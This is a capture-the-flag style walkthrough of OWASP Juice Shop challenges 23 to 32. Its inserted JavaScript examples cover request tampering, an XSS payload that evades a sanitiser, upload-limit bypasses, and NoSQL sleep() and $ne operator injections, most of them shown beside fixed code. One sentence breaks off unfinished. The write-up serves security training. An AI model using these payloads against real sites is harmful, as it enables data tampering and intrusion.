
Posted by deaguero at 2020-03-08

This article continues the previous ones and goes down to the next level. Readers who want to know how to set up the environment can refer to the first article. See part one: Hacking game | OWASP Juice Shop (1), and part two: Hacking game | OWASP Juice Shop (2).

0x02 Play

23: Product Tampering

The challenge is to modify the description of the O-Saft product. Refer to XSS Tier 3 in challenge 18 and change the product description through a PUT request. 1. First find the ID of the product. 2. Modify the description of that product via PUT, as shown in the figure below.
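The PUT request described above, as an added example that is not part of the original post and not Juice Shop's own code. It builds the request as plain data first so it can be inspected, then sends it with an injectable fetch. The API path /api/Products/<id>, the product ID 9, the bearer-token scheme, the base URL and the JUICE_TOKEN environment variable are assumptions for this illustration.

```javascript
// Added example (not from the original post): craft the PUT request that
// rewrites a product description on the Juice Shop REST API.
// Assumptions: the path /api/Products/<id>, the product ID, the bearer token
// and the base URL are placeholders for this illustration.

// Build the request as plain data so it can be inspected before sending.
function buildProductUpdate({ baseUrl, productId, token, description }) {
  return {
    url: `${baseUrl}/api/Products/${encodeURIComponent(productId)}`,
    init: {
      method: 'PUT',
      headers: {
        'Content-Type': 'application/json',
        // Assumed: the login JWT is sent as a bearer token.
        Authorization: `Bearer ${token}`,
      },
      body: JSON.stringify({ description }),
    },
  };
}

// Send the request and return the parsed response, or throw on a non-2xx
// status. fetchImpl is injectable so the call can be replayed or mocked.
async function tamperProduct(opts, fetchImpl = globalThis.fetch) {
  const { url, init } = buildProductUpdate(opts);
  const res = await fetchImpl(url, init);
  if (!res.ok) throw new Error(`PUT ${url} failed: HTTP ${res.status}`);
  return res.json();
}

// Stand-alone usage: only fires when a token is supplied via the environment,
// e.g. JUICE_TOKEN=<jwt> node tamper.js (assumed instance on localhost:3000).
if (typeof process !== 'undefined' && process.env && process.env.JUICE_TOKEN) {
  tamperProduct({
    baseUrl: 'http://localhost:3000',   // assumed Juice Shop instance
    productId: 9,                        // assumed ID looked up via /api/Products
    token: process.env.JUICE_TOKEN,      // assumed: JWT from a normal login
    description: 'Modified via PUT',
  }).then(p => console.log('updated:', p && p.data && p.data.description))
    .catch(err => console.error(err.message));
}
```

The ID is looked up first (step 1 above), the description is the only field sent, and the bearer token is whatever a normal login returned; nothing here depends on the browser UI.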

24: Vulnerable Library

The challenge asks you to inform the store which vulnerable library is in use (mention the exact library name and version in a comment). It turns out that sanitize-html version 1.4.2 was used in the site's development. The vulnerability of this version lies in
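An added example, not part of the original post and not sanitize-html's own code: a toy sanitiser that reproduces the class of defect present in sanitize-html 1.4.2, where disallowed tags are stripped in a single pass rather than recursively, so a tag hidden inside another one survives the cleanup. The regex-based stripping and the fixed-point loop are constructed for this illustration only; the real fix in later sanitize-html releases is a proper HTML parser, not a loop.

```javascript
// Added example (not from the original post, not sanitize-html's code): a
// single-pass tag stripper that shows why non-recursive sanitisation fails,
// next to a fixed-point variant that re-examines whatever a removal re-joins.

const SCRIPT_TAG = /<script\b[^>]*>[\s\S]*?<\/script\s*>/gi;

// Single pass, mirroring the defect: each <script>...</script> block is
// removed once, and the text that the removal joins together is never
// looked at again.
function stripOnce(html) {
  return html.replace(SCRIPT_TAG, '');
}

// Hardened variant: repeat until the output stops changing, so anything
// re-joined by a removal is itself sanitised on the next round.
function stripToFixedPoint(html, maxRounds = 20) {
  let current = html;
  for (let i = 0; i < maxRounds; i++) {
    const next = stripOnce(current);
    if (next === current) return next;
    current = next;
  }
  throw new Error('sanitiser did not converge');
}

// Constructed payload: the inner <script>Foo</script> is what the single
// pass removes, and the characters around it re-join into a live tag.
const NESTED_PAYLOAD = '<<script>Foo</script>script>alert(1)</script>';

// Returns what each sanitiser leaves of the payload.
function demo(payload = NESTED_PAYLOAD) {
  return {
    once: stripOnce(payload),
    fixed: stripToFixedPoint(payload),
  };
}
```

Run demo() and compare the two results: the single pass hands back a working script tag, while the fixed-point pass leaves nothing. The same nested-tag shape is what a reviewer looks for in a comment field protected by an old sanitiser.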


25: Easter Egg

The challenge asks you to find the hidden Easter egg, which sits in the FTP directory.


26: Eye Candy

Go back to the golden age of web design. This is solved by opening the browser's JavaScript console and entering a command.


27: Upload Size

The challenge requires uploading a file larger than 100 KB. Log in first.


28: Upload Type

Uploading a non-PDF file is just as simple: capture the request that uploads a PDF and modify the file type in it.
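One way to do both the size and the type bypass (challenges 27 and 28) outside the browser, as an added example that is not part of the original post and not Juice Shop's own code: the multipart body is assembled by hand so the client-side checks never run, and a captured PDF upload is rewritten with a different filename and declared type before replay. The endpoint /file-upload, the form field name "file", the boundary string, the 120 KB filler and the base URL are assumptions for this illustration.

```javascript
// Added example (not from the original post): hand-built multipart upload
// for the size bypass, plus rewriting of a captured upload for the type
// bypass. Endpoint, field name and boundary are assumed placeholders.

const BOUNDARY = '----JuiceShopExampleBoundary7d1c3a';

// Serialise one file field as a multipart/form-data body. Text content is
// enough here, since only size and file type are being checked.
function buildUploadRequest({ baseUrl, filename, contentType, content }) {
  const body =
    `--${BOUNDARY}\r\n` +
    `Content-Disposition: form-data; name="file"; filename="${filename}"\r\n` +
    `Content-Type: ${contentType}\r\n\r\n` +
    `${content}\r\n` +
    `--${BOUNDARY}--\r\n`;
  return {
    url: `${baseUrl}/file-upload`,
    init: {
      method: 'POST',
      headers: { 'Content-Type': `multipart/form-data; boundary=${BOUNDARY}` },
      body,
    },
  };
}

// Challenge 27: a body padded past the 100 KB limit the client enforces.
function oversizedUpload(baseUrl) {
  const padding = 'A'.repeat(120 * 1024); // constructed filler, about 120 KB
  return buildUploadRequest({
    baseUrl, filename: 'big.pdf', contentType: 'application/pdf', content: padding,
  });
}

// Challenge 28: take a captured PDF upload body and swap the filename and
// the declared part type before replaying it; the file bytes are untouched.
function retypeCapturedUpload(body, newFilename, newContentType) {
  return body
    .replace(/filename="[^"]*"/, `filename="${newFilename}"`)
    .replace(/Content-Type: [^\r\n]+/, `Content-Type: ${newContentType}`);
}

// Byte length of the body, the figure the 100 KB check compares against.
function bodySize(body) {
  return new TextEncoder().encode(body).length;
}

// Stand-alone usage: print the two forged requests without sending them.
const sample = oversizedUpload('http://localhost:3000'); // assumed instance
console.log('oversized body bytes:', bodySize(sample.init.body));
console.log(retypeCapturedUpload(sample.init.body, 'notes.txt', 'text/plain').slice(0, 160));
```

Send either request with fetch(url, init) against the target; the point is that the 100 KB limit and the PDF-only rule live in the page's JavaScript, so a request that never passes through that JavaScript is not subject to them.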

29: Login Bjoern

The challenge requires logging in with Bjoern's user account without changing his password, applying SQL injection, or hacking his Google account. His password hash can be obtained by SQL injection, but it cannot be cracked; after running a cracker for a long time, the author did not break it. In the end, auditing the source code turned up what is shown in the figure below.

30: Reset Bender's Password

The forgot-password feature must be used to reset Bender's password. As in the previous level, this is a social engineering problem, and the security answer can be worked out from what is publicly known about him.

31: NoSQL Injection Tier 1

The challenge requires making the server sleep for a period of time. The task statement makes it clear that this is NoSQL injection using a sleep function. In http://192.168.239.128:3000/rest/product/3/reviews, the 3 in the path is used as a parameter of the NoSQL query, so constructing sleep(1000) in its place makes the server sleep and passes the level.
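An added example, not part of the original post and not Juice Shop's own server code: a minimal in-memory reproduction of the query pattern behind this challenge, in which the product ID from the URL is concatenated into a $where-style JavaScript expression that is then evaluated once per document. The review documents, the sleep() helper and the fixed variant are constructed for this illustration.

```javascript
// Added example (not from the original post, not Juice Shop's code): why a
// path parameter spliced into a $where expression is code execution, and how
// a time-based probe such as sleep(<ms>) detects it.

const reviews = [                       // constructed sample documents
  { _id: 'r1', product: 3, message: 'great juice' },
  { _id: 'r2', product: 4, message: 'too sour' },
];

// Busy-wait helper standing in for the sleep() the injected payload calls.
function sleep(ms) {
  const end = Date.now() + ms;
  while (Date.now() < end) { /* spin */ }
}

// Vulnerable: the raw parameter becomes part of the predicate source, the
// same shape as '$where: "this.product == " + req.params.id'. The predicate
// runs once per document, so an injected sleep() is multiplied by the
// collection size.
function reviewsForProductVulnerable(productId) {
  const where = 'this.product == ' + productId;
  const predicate = new Function('sleep', 'return ' + where);
  return reviews.filter(doc => predicate.call(doc, sleep));
}

// Fixed: the parameter is data, never code. Parse it as an integer and
// compare with a structured filter instead of an evaluated string.
function reviewsForProductSafe(productId) {
  const n = Number(productId);
  if (!Number.isInteger(n)) throw new Error('invalid product id');
  return reviews.filter(doc => doc.product === n);
}

// Time-based probe: returns the result and how long the query took, which
// is the only signal an attacker gets from a blind sleep() injection.
function measure(fn, arg) {
  const start = Date.now();
  const result = fn(arg);
  return { result, elapsedMs: Date.now() - start };
}

// Stand-alone usage: a legitimate id, then the page's sleep(1000) payload.
console.log('id 3 ->', measure(reviewsForProductVulnerable, '3'));
console.log('sleep(1000) ->', measure(reviewsForProductVulnerable, 'sleep(1000)').elapsedMs, 'ms');
```

With two documents the sleep(1000) probe takes about two seconds, which is the delay the challenge is looking for; the safe variant rejects the same input before any query runs.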

32: NoSQL Injection Tier 2

The challenge requires multiple product reviews to be updated at the same time. Submit the request via the PATCH method.
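An added example, not part of the original post and not Juice Shop's own code: the PATCH body that updates every review, and a tiny matcher that shows why an "id" sent as an operator object rather than a string matches all documents. The matcher implements only the equality and $ne semantics needed for the effect; the endpoint path /rest/products/reviews, the sample documents and the requester field are assumptions for this illustration.

```javascript
// Added example (not from the original post, not Juice Shop's code): operator
// injection through a JSON body whose "id" is {$ne: ...} instead of a string,
// beside a handler that refuses non-string ids and checks ownership.

const reviewsDb = [                      // constructed sample documents
  { _id: 'a1', product: 1, message: 'fresh',  author: 'jim@juice-sh.op' },
  { _id: 'b2', product: 2, message: 'watery', author: 'bender@juice-sh.op' },
  { _id: 'c3', product: 3, message: 'great',  author: 'admin@juice-sh.op' },
];

// Mongo-style matching for one field: a plain value means equality, an
// object carrying $ne means "not equal", so {$ne: -1} matches every id.
function fieldMatches(filterValue, actual) {
  if (filterValue !== null && typeof filterValue === 'object' && '$ne' in filterValue) {
    return actual !== filterValue.$ne;
  }
  return actual === filterValue;
}

// Vulnerable handler: req.body.id goes straight into the filter, so the
// client decides whether it is a value or an operator document. Returns
// the number of documents updated.
function patchReviewVulnerable(db, body) {
  let updated = 0;
  for (const doc of db) {
    if (fieldMatches(body.id, doc._id)) { doc.message = body.message; updated++; }
  }
  return updated;
}

// Hardened handler: only string ids and messages are accepted, and only the
// requester's own review is touched, so neither operators nor other users'
// documents get through. requester is the authenticated user (assumed).
function patchReviewSafe(db, body, requester) {
  if (typeof body.id !== 'string' || typeof body.message !== 'string') {
    throw new Error('id and message must be strings');
  }
  let updated = 0;
  for (const doc of db) {
    if (doc._id === body.id && doc.author === requester) { doc.message = body.message; updated++; }
  }
  return updated;
}

// The request the challenge needs: PATCH with an operator object as the id.
function buildMassUpdate(baseUrl, message) {
  return {
    url: `${baseUrl}/rest/products/reviews`,
    init: {
      method: 'PATCH',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ id: { $ne: -1 }, message }),
    },
  };
}

// Stand-alone usage against the in-memory copy (nothing is sent anywhere).
const copy = reviewsDb.map(d => ({ ...d }));
const request = buildMassUpdate('http://localhost:3000', 'all reviews rewritten');
console.log(request.init.body);
console.log('updated:', patchReviewVulnerable(copy, JSON.parse(request.init.body)));
```

Send request.url with request.init to the target and every review changes in one call. The root cause is not the PATCH verb but that the id field is trusted as a raw query value; a type check (string only) closes the operator injection, and the ownership check closes the separate problem of editing someone else's review with a guessed id.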


0x03 To be continued

The further you go, the more interesting it gets, but some levels are not easy to pass. I hope to exchange different views and ideas with more people; some of the knowledge points I have not studied very well, so please give me your advice.
